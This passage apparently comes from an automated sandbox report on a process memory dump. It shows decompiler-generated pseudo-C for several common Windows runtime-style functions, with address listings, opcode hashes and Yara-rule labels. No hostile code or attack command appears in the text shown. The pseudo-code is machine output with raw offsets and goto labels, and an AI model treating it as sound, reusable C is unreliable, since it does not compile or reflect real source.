								_t76 = E050B2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E050B2C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E050B2ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E050DD0D1(_t62);
				goto L28;
			}

0x050b2990
0x050b2992
0x050b2997
0x050b29a3
0x050b29a6
0x050b29ab
0x050b29ad
0x050b29b2
0x050f5c80
0x050b29b8
0x050b29b8
0x050b29bb
0x050b29c0
0x050b29c5
0x050b29c6
0x050b29c6
0x050b29cb
0x00000000
0x00000000
0x050b29cd
0x050b29d0
0x050b29d9
0x050b29db
0x050b29dd
0x050b2a7f
0x050b2a84
0x050b2a87
0x050b2a89
0x050f5ca1
0x050f5ca3
0x00000000
0x050b2a8f
0x050b2a8f
0x00000000
0x050b2a8f
0x00000000
0x050b29e3
0x050b29e3
0x050b29e3
0x00000000
0x050b29e3
0x050b29dd
0x00000000
0x050b29db
0x050b29e6
0x050b29e9
0x050b29eb
0x050b29ed
0x050b29f3
0x050b29f5
0x050b29f8
0x050b29fa
0x050b2a97
0x050b2a9a
0x050b2a9d
0x050b2add
0x00000000
0x050b2a9f
0x050b2aa2
0x050b2aa5
0x050b2aa8
0x050b2aab
0x050f5cab
0x050f5caf
0x050f5cc5
0x050f5cda
0x050f5cdc
0x050f5cdf
0x050f5ce5
0x00000000
0x050f5ceb
0x050f5ced
0x050f5cee
0x00000000
0x050f5cee
0x050f5cb1
0x050f5cb4
0x050f5cb9
0x050f5cbb
0x00000000
0x050f5cbd
0x050f5cbd
0x00000000
0x050f5cbd
0x050f5cbb
0x050b2ab1
0x050b2ab1
0x050b2ac4
0x050b2ac6
0x050b2ac6
0x00000000
0x050b2ac6
0x050b2aab
0x00000000
0x050b2a00
0x050b2a09
0x050b2a0e
0x050b2a21
0x050b2a24
0x050b2a35
0x050b2a3a
0x050b2a3d
0x050b2a42
0x050b2a59
0x050b2a59
0x050b2a5c
0x050b2a5f
0x050b2a5f
0x050b29fa
0x050b29f3
0x050b2a64
0x050b2a64
0x050b2a6b
0x050b2a6b
0x050b2a6d
0x050b2a72
0x00000000

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42ba44c20a5a3fe13af925a21edfec9b93204f52574219bd2509b6243261c27d
Instruction ID: c791f83361d7d8e28a32f873cd30e24e6080a45a48ffb95f8dc12dfc34ad2228
Opcode Fuzzy Hash: 42ba44c20a5a3fe13af925a21edfec9b93204f52574219bd2509b6243261c27d
Instruction Fuzzy Hash: 92519CB5A0020ADFEF25DF54E884AEEBBB6FF48310F158015E815AB260C3B59D52CF90

Uniqueness

Uniqueness Score: -1.00%

Function 050B4D3B, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E050B4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x517d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E050CFA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x5177bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E050CB0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L050A4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E0508CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E050CB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E050CF380(_t67 + 0xc, 0x5065138, 0x10) == 0) {
								 *0x51760d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E050B4F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E050B4E70(0x51786b0, 0x50b5690, 0, 0) != 0) {
					_t46 = E0508CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}

0x050b4d3b
0x050b4d4d
0x050b4d53
0x050b4d58
0x050b4d65
0x050b4d6c
0x050b4d71
0x050b4d77
0x050b4d7f
0x050b4d8c
0x050b4d8e
0x050b4dad
0x050b4db0
0x050b4db7
0x050b4db8
0x050b4db9
0x050b4dba
0x050b4dbb
0x050b4dc1
0x050b4dc8
0x050b4dcc
0x050b4dd5
0x050b4dde
0x050b4ddf
0x050b4de0
0x050b4de1
0x050b4de6
0x050b4de7
0x050b4de9
0x050b4df3
0x00000000
0x00000000
0x050f6c7c
0x050f6c8a
0x050f6c8a
0x050f6c9d
0x050f6ca7
0x050f6cac
0x050f6cb2
0x050f6cb9
0x00000000
0x050f6cbf
0x050f6cbf
0x00000000
0x050f6cbf
0x050f6cb9
0x050b4dfb
0x050f6ccf
0x050f6cd3
0x050b4e32
0x050b4e39
0x050f6ce0
0x050f6cf2
0x050f6cf2
0x050f6ce0
0x050b4e3f
0x050b4e41
0x050b4e51
0x050b4e51
0x050b4e03
0x050b4e03
0x050b4e09
0x050b4e0f
0x050b4e57
0x00000000
0x00000000
0x050b4e1b
0x050b4e30
0x050b4e5b
0x050b4e5b
0x00000000
0x050b4e30
0x050b4e11
0x050b4e11
0x050b4e16
0x00000000
0x050b4e16
0x050b4e01
0x00000000
0x050b4e01
0x050b4da5
0x050f6c6b
0x00000000
0x050b4dab
0x050b4dab
0x00000000
0x050b4dab

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f0efaa4b04ba44528c1b139c98f1289314193f8856ba51d70ea5311220cf444
Instruction ID: 1d3931d61a78355dac956b191e361ce82e4f45073bba544a8513203998d474ac
Opcode Fuzzy Hash: 4f0efaa4b04ba44528c1b139c98f1289314193f8856ba51d70ea5311220cf444
Instruction Fuzzy Hash: 5841C071A40318AFEB21DF14EC85FFEB7ABEB15610F000099E9459B281D7B19E40CB91

Uniqueness

Uniqueness Score: -1.00%

Function 050B4BAD, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E050B4BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x517d360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E0508CC50(_t86);
					L11:
					return E050CB640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x5178504
				E050A2280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E050CFA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E050CB0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L050A4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E0508CCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x5178504
								E0509FFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E050B4F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}

0x050b4bad
0x050b4bbf
0x050b4bc2
0x050b4bc6
0x050b4bcd
0x050b4bd9
0x050f67fe
0x050f6800
0x050b4ccc
0x050b4ccd
0x050b4cb7
0x050b4cc9
0x050b4cc9
0x050b4bdf
0x050b4be5
0x00000000
0x00000000
0x050b4beb
0x050b4bef
0x00000000
0x00000000
0x050b4bf5
0x050b4bf9
0x050b4c06
0x050b4c0b
0x050b4c17
0x050b4c1c
0x050b4c1f
0x050b4c25
0x050b4c33
0x050b4c3d
0x050b4c40
0x050b4c43
0x050b4c47
0x050b4c4d
0x050b4c53
0x050b4c54
0x050b4c55
0x050b4c56
0x050b4c5b
0x050b4c5c
0x050b4c63
0x050b4c6b
0x00000000
0x00000000
0x050f6776
0x050f6784
0x050f6784
0x050f679f
0x050f67a7
0x050f67af
0x050f67ce
0x00000000
0x050f67b1
0x050f67b7
0x050f67b8
0x050f67c1
0x050f67d3
0x050f67d9
0x050f67dd
0x050b4c94
0x050b4c94
0x050b4c98
0x050b4c9c
0x050b4ca3
0x050f67f4
0x050f67f4
0x050b4cb5
0x00000000
0x00000000
0x00000000
0x00000000
0x050b4cb5
0x050b4c79
0x050b4c7e
0x050b4c89
0x050b4c8b
0x050b4c8f
0x050b4c8f
0x00000000
0x050b4c89
0x050f67c3
0x00000000
0x050f67c3
0x050f67af
0x050b4c73
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eab36c3a3ab0b262130fcc7ea0831473abde13f29d289c830822b4dc3d2aef57
Instruction ID: bb696e4aa2515648fa73aa9b9782199523ee13887ea1d5242cc216679ce362c0
Opcode Fuzzy Hash: eab36c3a3ab0b262130fcc7ea0831473abde13f29d289c830822b4dc3d2aef57
Instruction Fuzzy Hash: 5141A436A003289BDF61DF64E984FEE77B5FF45700F0100A5E909AB241DB759E84CB91

Uniqueness

Uniqueness Score: -1.00%

Function 05098A0A, Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E05098A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x517d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E050CB640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E0509E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x5061180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E050B1DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E050C3C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E05098999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}

0x05098a0a
0x05098a1c
0x05098a23
0x05098a2e
0x05098a30
0x05098a36
0x05098a3c
0x05098a3e
0x05098a4a
0x05098a52
0x05098a9c
0x05098aae
0x05098a58
0x05098a5e
0x05098a6a
0x05098a6f
0x05098a75
0x05098a7d
0x05098a85
0x05098a86
0x05098a89
0x05098a93
0x05098a99
0x05098a9b
0x00000000
0x05098aaf
0x05098abe
0x05098ac3
0x05098acb
0x05098ad7
0x05098ae0
0x05098af1
0x00000000
0x05098af1
0x05098acd
0x05098ad5
0x05098afb
0x05098afd
0x05098aff
0x05098b07
0x05098b22
0x05098b24
0x05098b2a
0x05098b2e
0x05098b3f
0x05098b78
0x05098b41
0x05098b52
0x05098b54
0x05098b5c
0x05098b74
0x05098b74
0x05098b5c
0x05098b3f
0x05098b5e
0x05098b61
0x05098b64
0x05098b64
0x05098b6c
0x05098b6c
0x05098b11
0x050e9cd5
0x050e9cd5
0x05098b17
0x05098b1a
0x05098b1a
0x00000000
0x05098ad5
0x05098a89

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2363446796ef4deca2df4527e6cbcd840f9be7f04eae97bbc8e28457e734595b
Instruction ID: f1bfcd52b52681f411f84a453b0621623e8119c26bb55fb43f1f63a76cd96ebc
Opcode Fuzzy Hash: 2363446796ef4deca2df4527e6cbcd840f9be7f04eae97bbc8e28457e734595b
Instruction Fuzzy Hash: 63415CB1A002289BDF68CF19E888AAEB7F9FF55300F1485E9D81997345E7709E81DF50

Uniqueness

Uniqueness Score: -1.00%

Function 051069A6, Relevance: .1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E051069A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x517d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L05096C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E05106BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E050C9980() >= 0) {
							E050A2280(_t56, 0x5178778);
							_t77 = 1;
							_t68 = 1;
							if( *0x5178774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x5178774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E0508B6F0(0x506c338, 0x506c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E050C9520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E050C95D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E0509FFB0(_t68, _t77, 0x5178778);
				}
				_pop(_t78);
				return E050CB640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}

0x051069b5
0x051069be
0x051069c3
0x051069c9
0x051069cc
0x051069d1
0x051069d3
0x051069de
0x051069e1
0x051069ea
0x051069f6
0x051069fe
0x05106a13
0x05106a14
0x05106a15
0x05106a16
0x05106a1e
0x05106a26
0x05106a31
0x05106a36
0x05106a37
0x05106a40
0x05106a49
0x05106a4a
0x05106a53
0x05106a59
0x05106a5d
0x05106a5e
0x05106a64
0x05106a67
0x05106a6a
0x05106a6d
0x05106a70
0x05106a77
0x05106a7d
0x05106a86
0x05106a89
0x05106a9c
0x05106a9f
0x05106aa2
0x05106aa5
0x05106aaf
0x05106ab1
0x05106ab8
0x05106ab9
0x05106abb
0x05106abe
0x05106ac5
0x05106ac5
0x05106aaf
0x05106a40
0x05106a26
0x051069fe
0x05106ace
0x05106ad0
0x05106ad3
0x05106ad8
0x05106adf
0x05106adf
0x05106ae8
0x05106aef
0x05106aef
0x05106af9
0x05106b06

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 211539ddd842829ad306dfa804be54e539fe4b428abb38e8d71ba425c8f4c6f3
Instruction ID: 884fce7f20cf10f7c0ce9b8d137102733488dc6629f5d3c5d1c1dd5bb838d2fd
Opcode Fuzzy Hash: 211539ddd842829ad306dfa804be54e539fe4b428abb38e8d71ba425c8f4c6f3
Instruction Fuzzy Hash: 904168B1E0021CAFDB14EFA8D845BFEBBF4FF48314F14816AE815A6280DB709905CB50

Uniqueness

Uniqueness Score: -1.00%

Function 050C3D43, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E050C3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E05097B60(0, _t61, 0x50611c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E05097B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L050A4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}

0x050c3d4c
0x050c3d50
0x050c3d55
0x050c3d5e
0x050fe79a
0x00000000
0x050fe79a
0x050c3d68
0x050fe789
0x050c3d9d
0x050c3da3
0x050c3daf
0x050c3db5
0x050c3dbc
0x050c3dc4
0x050c3dc9
0x050c3dce
0x050fe7ae
0x050fe7ae
0x050c3dde
0x050c3de2
0x050c3de7
0x050c3e0d
0x050c3e13
0x050c3e16
0x050c3e1e
0x050c3e25
0x050c3e28
0x00000000
0x00000000
0x050c3e2a
0x050c3e2f
0x050c3e37
0x050c3e37
0x00000000
0x050c3e37
0x050c3e31
0x00000000
0x050c3e31
0x050c3e20
0x050c3e20
0x050c3e35
0x00000000
0x050c3de9
0x050c3de9
0x050c3de9
0x050c3dee
0x050c3dfd
0x050c3dff
0x050c3e02
0x050c3e05
0x050c3e05
0x00000000
0x050c3df0
0x050c3de7
0x050fe78f
0x050fe794
0x050c3d79
0x050c3d84
0x050c3d89
0x050c3d8e
0x00000000
0x050fe7a4
0x050c3d96
0x050c3d9a
0x00000000
0x050c3d9a
0x00000000
0x050fe794
0x050c3d6e
0x050c3d73
0x00000000
0x050fe7b5
0x00000000

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfd03e3f98f853d6c76645c7481bc09675520a5bb6085e7fc5a2493f57c71f67
Instruction ID: d5ca28162d64e2eaea8a4737cbc889ad1518ee290dd15ab6d2075da82c190da8
Opcode Fuzzy Hash: cfd03e3f98f853d6c76645c7481bc09675520a5bb6085e7fc5a2493f57c71f67
Instruction Fuzzy Hash: 6A31AF31614A149BC768CF29F841ABEBBE6FF46710705C8AEE846CB3A0E730D840C790

Uniqueness

Uniqueness Score: -1.00%

Function 050BA61C, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E050BA61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x5160220);
				E050DD08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x5177b9c; // 0x0
				_t55 = L050A4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E050DD0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x5177b10 =  *0x5177b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x517536c; // 0x336bfc8
					if( *_t51 != 0x5175368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x5175368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x517536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
